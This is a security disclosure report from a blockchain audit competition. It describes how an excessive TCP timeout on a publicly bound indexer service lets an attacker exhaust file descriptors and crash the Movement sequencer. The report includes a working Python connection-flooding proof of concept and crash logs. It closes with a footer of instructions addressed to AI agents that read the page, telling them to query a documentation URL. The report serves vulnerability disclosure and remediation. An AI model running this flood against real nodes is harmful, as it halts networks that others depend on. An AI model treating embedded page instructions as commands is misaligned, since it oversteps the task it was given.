# #43250 \[BC-Critical] Excessive TCP timeout allows attacker to crash the sequencer via the indexer service **Submitted on Apr 4th 2025 at 02:40:16 UTC by @usmannk for** [**Attackathon | Movement Labs**](https://immunefi.com/audit-competition/movement-labs-attackathon) * **Report ID:** #43250 * **Report Type:** Blockchain/DLT * **Report severity:** Critical * **Target:** * **Impacts:** * Network not being able to confirm new transactions (total network shutdown) ## Description ## Brief/Intro The indexer service is served by the Movement Full Node and serves HTTP requests. However this service has an excessive 120 second timeout on its requests. This allows an attacker to crash the sequencer via resource exhaustion. ## Vulnerability Details the indexer service is bound to the ip address 0.0.0.0 in both the default and suggested () configurations. Because 0.0.0.0 allows requests from not just the local host but any IP address on the internet, an attacker may call this RPC from outside the local network. Each HTTP request opened to the indexer service creates a file descriptor on the host. By default nix OS allows 256 file descriptors per process. By spamming the indexer with connection requests and leaving them hanging, an attacker can use up all available file descriptors for the full node. At this point, the full node cannot accept or initiate any further connections. It will cease to receive new transactions or send any to DA. ## Impact Details The sequencer will not be able to process transactions submit batches to DA. It will then also panic and crash, halting the network. ## References The main RPC and sequencer node serves such an indexer: ## Proof of Concept ## Proof of Concept * run movement stack by calling just movement-full-node native build.setup.celestia-local.eth-local * run the following python code pointed at the address and port of the indexer service ``` import socket server_address = ('localhost', 30734) arr = [] for _ in range(9999): # adjust for fd limit, likely 256 will suffice arr.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) arr[-1].connect(server_address) ``` * observe as the sequencer node becomes unavailable then the sequencer crashes, halting the network. ``` 2025-04-04T02:30:39.836891Z ERROR hyper::server::tcp: accept error: Too many open files (os error 24) Error: readiness check fail - exit status 56 2025-04-04T02:30:40.336431Z INFO movement_full_node::node::manager: Receive Terminate Signal thread 'tokio-runtime-worker' panicked at /Users//.cargo/registry/src/index.crates.io-6f17d22bba15001f/tokio-1.41.1/src/ runtime/blocking/shutdown.rs:51:21: Cannot drop a runtime in a context where blocking is not allowed. This happens when a runtime is dropped from within an asynchronous context. stack backtrace: 2025-04-04T02:30:40.838283Z ERROR hyper::server::tcp: accept error: Too many open files (os error 24) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://reports.immunefi.com/movement-labs-attackathon/43250-bc-critical-excessive-tcp-timeout-allows-attacker-to-crash-the-sequencer-via-the-indexer-servi.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.